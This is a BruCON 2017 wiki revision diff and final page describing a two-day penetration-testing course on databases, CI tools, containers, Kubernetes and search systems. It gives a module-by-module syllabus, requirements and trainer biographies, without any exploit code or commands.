SEARCH
TOOLBOX
LANGUAGES
Difference between revisions of "Training 2017 - Pentesting the Modern Application Stack"

Difference between revisions of "Training 2017 - Pentesting the Modern Application Stack"

From BruCON 2017

Jump to: navigation, search
(Created page with "=Pentesting the Modern Application Stack= Pentesting the Modern Application Stack is a unique course that covers red team tactics for pentesting modern day application stack....")
 
(Hardware/software Requirements)
 
(11 intermediate revisions by the same user not shown)
Line 9: Line 9:
 
In this 2 day course we start by looking into red team tactics for pentesting modern application stack consisting of Databases,CI tools, Distributed Configuration & Resource management tools, Containers, Big Data Environments, Search technologies and Message Brokers.
 
In this 2 day course we start by looking into red team tactics for pentesting modern application stack consisting of Databases,CI tools, Distributed Configuration & Resource management tools, Containers, Big Data Environments, Search technologies and Message Brokers.
  
 +
= Course Contents =
 
Along with the training knowledge, the course also aims to impart the technical know-how methodology of testing these systems. This course is meant for anyone who would like to know, attack or secure the modern day stack. The students are bound to have some real fun and entirely new experience through this unique course, as we go through multiple challenging scenarios one might not have come across.
 
Along with the training knowledge, the course also aims to impart the technical know-how methodology of testing these systems. This course is meant for anyone who would like to know, attack or secure the modern day stack. The students are bound to have some real fun and entirely new experience through this unique course, as we go through multiple challenging scenarios one might not have come across.
  
 
During the entire duration of the course, the students are expected to learn the following
 
During the entire duration of the course, the students are expected to learn the following
 
* Look for vulnerabilities within the application stack.
 
* Look for vulnerabilities within the application stack.
* Gain in depth knowledge on how to pentest the modern stack consisting ofContinuous Build & Deployment tools, Message broker's, Configuration Management systems, Resource Management systems and Distributed file systems.
+
* Gain in depth knowledge on how to pentest the modern stack consisting of Continuous Build & Deployment tools, Message broker's, Configuration Management systems, Resource Management systems and Distributed file systems.
 
* Security testing of an entire application stack from an end-to-end perspective.
 
* Security testing of an entire application stack from an end-to-end perspective.
Teaching Methodology:
 
Students are encouraged to follow the technical training with hands-on approach to the
 
facilitated labs for every module to gain deeper and practical understanding of the topic
 
 
= Course Contents =
 
  
The focus of this training is on the offensive and dangerous parts of HTML, JavaScript and related technologies, the nasty and undocumented stuff, dozens of new attack techniques straight from the laboratory of horrors of those maintaining the HTML5 Security Cheatsheet. We’ll learn how to attack any web-application with either unknown legacy features – or the half-baked results coming to your browser from the labs of W3C, WHATWG and the ES2016 mailing lists. Whether you want to attack modern web applications or shiny browser extensions and Chrome Packaged Apps – we have that covered.
+
== Day 1 ==
 +
=== Module 0: Modern Application Stack===
 +
* Evolution of Application Stack
 +
* Components of Stack
 +
* Threat Modelling
 +
* Attack Surface
 +
=== Module 1: Pentesting Databases===
 +
* MySQL,Postgres and OracleDB
 +
** Basic Enumeration
 +
** Laying out the attack surface
 +
** Pentesting third party plugins.
 +
** Attacking Database Servers.
 +
** Case Study of CVE-2016-6663
 +
** Security testing using tools of trade.
 +
* Pentesting NoSQL Databases & Caches: MongoDB, Cassandra, Redis & Memcache
 +
** Fingerprinting NoSQL databases,
 +
** Injection attacks on NoSQL Databases.
 +
** Attacking and identifying vulnerabilities in NoSQL databases through NoSQL exploitation framework.
 +
** Case study on Mongo Ransomware and hands on vulnerable applications.
 +
* Securing databases.
 +
===Module 2: Public Cloud Environments===
 +
* Introduction to Cloud Environments.
 +
* AWS Configurations & AWS Security Checks.
 +
* Pentesting AWS lambda servers.
 +
* Secure Best practices for Cloud environments and Securing AWS instances
 +
===Module 3: CI Tools===
 +
* Introduction to Jenkins, TeamCity and Go.
 +
* Basic misconfigurations and attack surface for these tools.
 +
* Security testing of CI Tools and outlook on vulnerabilities in Jenkins, TeamCity and Go.
 +
* Case Study: Remote Code Execution on Jenkins.
 +
===Module 4: Software Collaboration Tools===
 +
* Leveraging Version Control Systems like Git, SVN and Perforce.
 +
* Attacking Code collaboration tools - Phabricator, Gitlab and Github Enterprise.
 +
===Module 5: Message Brokers===
 +
* Introduction to RabbitMQ and Kafka.
 +
* Common misconfigurations.
 +
* Attacking and extracting juicy information from Message brokers.
 +
==Day 2==
 +
===Module 6: Containers===
 +
* Hacking Docker environments.
 +
* Setting up vulnerability static analysis for Docker containers (Clair and other tools).
 +
* Hacking Vagrant instances.
 +
* Securing Docker and Vagrant instances.
 +
===Module 7: Distributed Configuration Management Systems (DCMS)===
 +
* Attacking Apache Zookeeper, HashiCorp Consul & Serf, CoreOS Etcd.
 +
* Owning the entire application thorough DCMS , pivoted attacks.
 +
* Attacking and Scanning using Garfield.
 +
===Module 8: Distributed File System===
 +
* Basic misconfigurations for Hadoop.
 +
* Analysing the threat model for Hadoop.
 +
* Attacks and remote code executions on Hadoop.
 +
* Securing Hadoop Instances.
 +
===Module 9: Kubernetes,Mesos and Marathon (Distributed Deployment & Resource Management)===
 +
* Introduction to Kubernetes,Mesos and Marathon
 +
* Fingerprinting Kubernetes,Mesos and Marathon
 +
* Common Misconfigurations
 +
* Pentesting Kubernetes and pivoting through kubernetes containers.
 +
* Hacking entire application stack through Mesos and Marathon.
 +
* Securing Mesos instances.
 +
===Module 10: Search Technologies===
 +
* Introduction to ElasticSearch and Apache Solr (Lucene)
 +
* Laying out the attack surface and common misconfigurations.
 +
* Pentesting ElasticSearch and Solr.
 +
* Case Study :ElasticSearch CVE-2015-1427 RCE Exploit.
  
HTML is a living standard. And so is this training. The course material will be provided on-site and via access to a private Github repository so all attendees will be receive updated material even months after the actual training. All attendees are granted perpetual access to updated slides and material.
+
Labs: 10+ containerized labs to emulate sophisticated production stack along with applications..
  
Check out one of the many [https://www.youtube.com/results?search_query=mario+heiderich videos] of Mario's security talks and research.
 
  
<youtube>U4e0Remq1WQ</youtube>
+
'''Students will receive :'''
 +
* Presentation Material and associated pdfs.
 +
* 10+ containerized labs to emulate sophisticated production application stacks.
 +
* Access to specific relevant OpSecX courses and certifications.
  
 
= Target audience =
 
= Target audience =
Whoever works with or against the security of modern web applications will enjoy and benefit from this training. A bit of knowledge on HTML and JavaScript is required, but rookies and rocket scientists will be satisfied equally.
+
DevSecOps, Security Engineers, Penetration testers, Bug bounty hunters, System Administrators, SOC analysts, Security enthusiasts and anyone interested in the modern application stack.
  
 
= Requirements =  
 
= Requirements =  
  
 
Students should have :
 
Students should have :
* A bit of knowledge on HTML, JavaScript is required
+
* Knowledge of basic pentesting, web application working and linux command line basics
 +
* The ability to use a web proxy like Burp Suite, ZAP, and the ability to write basic scripts in any interpreted language is an added advantage.
  
 
= Hardware/software Requirements =
 
= Hardware/software Requirements =
 +
The requirement for the course is a laptop with administrative and USB access and minimum configuration of 8GB RAM and 100GB hard-disk space. Full virtualisation support, Virtual Box and Docker should be installed. Unix box is preferred.
  
* Laptop with several browsers installed (MSIE, Edge, Firefox and Chrome)
+
=Trainers Biography=
 
+
[[File:Bharadwaj.Machiraju_(Large).jpg|thumb|125px]]
= Testimonials =
+
Bharadwaj Machiraju is project leader for OWASP OWTF. He is mostly found either building a web appsec tool or hunting bugs for fame (hackerone.com/tunnelshade). All tools are available at github.com/tunnelshade and all ramblings at blog.tunnelshade.in . Spoke at few conferences notably PHDays, Nullcon, Troopers, Brucon, Pycon India etc.. Apart from information security, he is interested in sleeping, mnemonic techniques & machine learning.
 
 
What previous students had to say about this training :  
 
 
 
"''Pure enjoyment for all 3 days.''"
 
 
 
"''XXS Nirvana''"
 
  
"''The best ever offensive web application security training''"
+
<br>[[Image:300px-twitter-icon.jpg|17px]] [https://twitter.com/tunnelshade_ @tunnelshade_]
  
=Trainer Biography=
+
[[File:Francis.Alexander_(Large).JPG|thumb|125px]]  
[[File:Heiderich.jpg|thumb|125px]]  
+
Francis Alexander, Works as a Security Engineer for Envestnet | Yodlee , finds his free time fuzzing or either writing to modules to the NoSQL Exploitation framework, NoSQL Honeypot or Garfield. Areas of interest include NoSQL Databases, Machine Learning and Cloud Security. Overwhelmed & honoured to speak & train at variety of conferences such as PHDays, Troopers, Hack in the Box, Hack in Paris, 44Con, Nullcon, C0c0n.
Dr.-Ing. Mario Heiderich, Director of Cure53, handsome heart-breaker, bon-vivant and (as he loves to call himself) “security researcher” is from Berlin, likes everything between lesser- and greater-than and leads a small yet exquisite pen-test company. He commonly pesters peaceful attendees on various capitalist conferences with powerpoint-slides and profanities. Wherever Mario goes, bad weather and thunderstorms follow him. Doctors worldwide are clueless about this extraordinary condition of his.
 
  
<br>[[Image:300px-twitter-icon.jpg|17px]] [https://twitter.com/0x6D6172696F @0x6D6172696F]
+
<br>[[Image:300px-twitter-icon.jpg|17px]] [https://twitter.com/torque59 @torque59]
  
 
Links :  
 
Links :  
* [https://www.cure53.de Cure53.de]
+
* [https://hackerone.com/tunnelshade Bharadwaj's HackerOne profile]
* [https://www.linkedin.com/in/marioheiderich Mario's LinkedIn]
+
* [https://github.com/tunnelshade Bharadwaj's Github]
* [https://www.slideshare.net/x00mario Mario's Slideshare]
+
* [http://blog.tunnelshade.in/ Blog]
* [https://www.youtube.com/results?search_query=mario+heiderich Videos by or refer to Mario's work]
+
''Mon. 2 - 3 October 2017 ('''09:00 - 17:00''') (2-day) - Novotel Ghent Centrum''
''Mon. 2 - 4 October 2017 ('''09:00 - 17:00''') (3-day) - Novotel Ghent Centrum''
 
  
 
[[File:Register.jpg||link=https://registration.brucon.org/training-registration/]]
 
[[File:Register.jpg||link=https://registration.brucon.org/training-registration/]]

Latest revision as of 15:06, 6 June 2017

Pentesting the Modern Application Stack

Pentesting the Modern Application Stack is a unique course that covers red team tactics for pentesting modern day application stack. Attendees will learn to identify, exploit and exfiltrate data from Database Servers, Software Collaboration tools, CI tools, Distributed Configuration & Resource management tools, Containers, Big Data Environments, Search Technologies and Message Brokers. The 2 days course is a fast paced and completely hands on program that aims to impart the technical know-how methodology and tools of trade for testing these systems. Real world corporate stacks are emulated in the form of containerised challenges to prepare students for real world scenarios.

Course Description

Continuous Build & Deployment tools, Message brokers, Configuration Management systems, Resource Management systems and Distributed file systems are some of the most common systems deployed in modern cloud infrastructures thanks to the increase in the distributed nature of software. Modern day pentesting is no more limited to remote command execution from an exposed web application. In present day scenario, all these applications open up multiple doors into a company’s infrastructure. One must be able to effectively find and compromise these systems for a better foothold on the infrastructure which is evident through the recent attacks on the application stack through platforms like Shodan paving way for a full compromise on corporate infrastructures.

In this 2 day course we start by looking into red team tactics for pentesting modern application stack consisting of Databases,CI tools, Distributed Configuration & Resource management tools, Containers, Big Data Environments, Search technologies and Message Brokers.

Course Contents

Along with the training knowledge, the course also aims to impart the technical know-how methodology of testing these systems. This course is meant for anyone who would like to know, attack or secure the modern day stack. The students are bound to have some real fun and entirely new experience through this unique course, as we go through multiple challenging scenarios one might not have come across.

During the entire duration of the course, the students are expected to learn the following

  • Look for vulnerabilities within the application stack.
  • Gain in depth knowledge on how to pentest the modern stack consisting of Continuous Build & Deployment tools, Message broker's, Configuration Management systems, Resource Management systems and Distributed file systems.
  • Security testing of an entire application stack from an end-to-end perspective.

Day 1

Module 0: Modern Application Stack

  • Evolution of Application Stack
  • Components of Stack
  • Threat Modelling
  • Attack Surface

Module 1: Pentesting Databases

  • MySQL,Postgres and OracleDB
    • Basic Enumeration
    • Laying out the attack surface
    • Pentesting third party plugins.
    • Attacking Database Servers.
    • Case Study of CVE-2016-6663
    • Security testing using tools of trade.
  • Pentesting NoSQL Databases & Caches: MongoDB, Cassandra, Redis & Memcache
    • Fingerprinting NoSQL databases,
    • Injection attacks on NoSQL Databases.
    • Attacking and identifying vulnerabilities in NoSQL databases through NoSQL exploitation framework.
    • Case study on Mongo Ransomware and hands on vulnerable applications.
  • Securing databases.

Module 2: Public Cloud Environments

  • Introduction to Cloud Environments.
  • AWS Configurations & AWS Security Checks.
  • Pentesting AWS lambda servers.
  • Secure Best practices for Cloud environments and Securing AWS instances

Module 3: CI Tools

  • Introduction to Jenkins, TeamCity and Go.
  • Basic misconfigurations and attack surface for these tools.
  • Security testing of CI Tools and outlook on vulnerabilities in Jenkins, TeamCity and Go.
  • Case Study: Remote Code Execution on Jenkins.

Module 4: Software Collaboration Tools

  • Leveraging Version Control Systems like Git, SVN and Perforce.
  • Attacking Code collaboration tools - Phabricator, Gitlab and Github Enterprise.

Module 5: Message Brokers

  • Introduction to RabbitMQ and Kafka.
  • Common misconfigurations.
  • Attacking and extracting juicy information from Message brokers.

Day 2

Module 6: Containers

  • Hacking Docker environments.
  • Setting up vulnerability static analysis for Docker containers (Clair and other tools).
  • Hacking Vagrant instances.
  • Securing Docker and Vagrant instances.

Module 7: Distributed Configuration Management Systems (DCMS)

  • Attacking Apache Zookeeper, HashiCorp Consul & Serf, CoreOS Etcd.
  • Owning the entire application thorough DCMS , pivoted attacks.
  • Attacking and Scanning using Garfield.

Module 8: Distributed File System

  • Basic misconfigurations for Hadoop.
  • Analysing the threat model for Hadoop.
  • Attacks and remote code executions on Hadoop.
  • Securing Hadoop Instances.

Module 9: Kubernetes,Mesos and Marathon (Distributed Deployment & Resource Management)

  • Introduction to Kubernetes,Mesos and Marathon
  • Fingerprinting Kubernetes,Mesos and Marathon
  • Common Misconfigurations
  • Pentesting Kubernetes and pivoting through kubernetes containers.
  • Hacking entire application stack through Mesos and Marathon.
  • Securing Mesos instances.

Module 10: Search Technologies

  • Introduction to ElasticSearch and Apache Solr (Lucene)
  • Laying out the attack surface and common misconfigurations.
  • Pentesting ElasticSearch and Solr.
  • Case Study :ElasticSearch CVE-2015-1427 RCE Exploit.

Labs: 10+ containerized labs to emulate sophisticated production stack along with applications..


Students will receive :

  • Presentation Material and associated pdfs.
  • 10+ containerized labs to emulate sophisticated production application stacks.
  • Access to specific relevant OpSecX courses and certifications.

Target audience

DevSecOps, Security Engineers, Penetration testers, Bug bounty hunters, System Administrators, SOC analysts, Security enthusiasts and anyone interested in the modern application stack.

Requirements

Students should have :

  • Knowledge of basic pentesting, web application working and linux command line basics
  • The ability to use a web proxy like Burp Suite, ZAP, and the ability to write basic scripts in any interpreted language is an added advantage.

Hardware/software Requirements

The requirement for the course is a laptop with administrative and USB access and minimum configuration of 8GB RAM and 100GB hard-disk space. Full virtualisation support, Virtual Box and Docker should be installed. Unix box is preferred.

Trainers Biography

Bharadwaj.Machiraju (Large).jpg

Bharadwaj Machiraju is project leader for OWASP OWTF. He is mostly found either building a web appsec tool or hunting bugs for fame (hackerone.com/tunnelshade). All tools are available at github.com/tunnelshade and all ramblings at blog.tunnelshade.in . Spoke at few conferences notably PHDays, Nullcon, Troopers, Brucon, Pycon India etc.. Apart from information security, he is interested in sleeping, mnemonic techniques & machine learning.


300px-twitter-icon.jpg @tunnelshade_

Francis.Alexander (Large).JPG

Francis Alexander, Works as a Security Engineer for Envestnet | Yodlee , finds his free time fuzzing or either writing to modules to the NoSQL Exploitation framework, NoSQL Honeypot or Garfield. Areas of interest include NoSQL Databases, Machine Learning and Cloud Security. Overwhelmed & honoured to speak & train at variety of conferences such as PHDays, Troopers, Hack in the Box, Hack in Paris, 44Con, Nullcon, C0c0n.


300px-twitter-icon.jpg @torque59

Links :

Mon. 2 - 3 October 2017 (09:00 - 17:00) (2-day) - Novotel Ghent Centrum

Register.jpg

Back to Training Overview